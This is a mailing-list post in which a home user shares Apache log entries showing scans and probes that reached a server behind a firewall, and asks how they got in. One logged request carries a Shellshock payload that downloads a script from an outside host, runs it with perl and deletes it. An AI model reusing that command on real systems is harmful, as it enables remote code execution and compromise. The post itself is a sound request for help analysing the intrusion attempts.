[lug] Apache requests (to webdav) behind firewall?!

Bear Giles bgiles at coyotesong.com
Mon Nov 14 22:00:44 MST 2016


​I was looking for something else and was shocked to see there are requests
in my Apache logs on my home system - behind a firewall that isn't supposed
to be doing port forwarding!

​164.132.201.51 - - [13/Nov/2016:08:47:56 -0700] "PROPFIND /webdav/
HTTP/1.1" 405 569 "-" "WEBDAV Client"
212.92.127.143 - - [13/Nov/2016:09:10:45 -0700] "GET / HTTP/1.0" 200 3593
"-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
23.247.72.43 - - [13/Nov/2016:11:35:42 -0700] "GET / HTTP/1.1" 200 3574 "-"
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;
.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC
6.0)"
164.132.201.51 - - [13/Nov/2016:12:39:32 -0700] "PROPFIND /webdav/
HTTP/1.1" 405 569 "-" "WEBDAV Client"
212.92.127.29 - - [13/Nov/2016:14:21:52 -0700] "GET
/cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 479 "-" "() { :; }; /bin/bash -c
\"wget -O /tmp/.nova.txt 93.158.203.136/style.css; curl -o /tmp/.nova.txt
93.158.203.136/style.css; perl /tmp/.nova.txt; rm -rf /tmp/.nova.txt\""
141.212.122.128 - - [13/Nov/2016:14:26:01 -0700] "GET /x HTTP/1.1" 400 0
"-" "Telesphoreo"
192.99.144.140 - - [13/Nov/2016:14:54:49 -0700] "PROPFIND /webdav/
HTTP/1.1" 405 569 "-" "WEBDAV Client"

​There are obviously probes - but how did they get into the system? Via
malicious javascript that's getting past my filters? Something else? The
'wget' entry is particularly disturbing since it clearly recognizes that
I'm running Linux.​
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.lug.boulder.co.us/pipermail/lug/attachments/20161114/f06352db/attachment.html>


More information about the LUG mailing list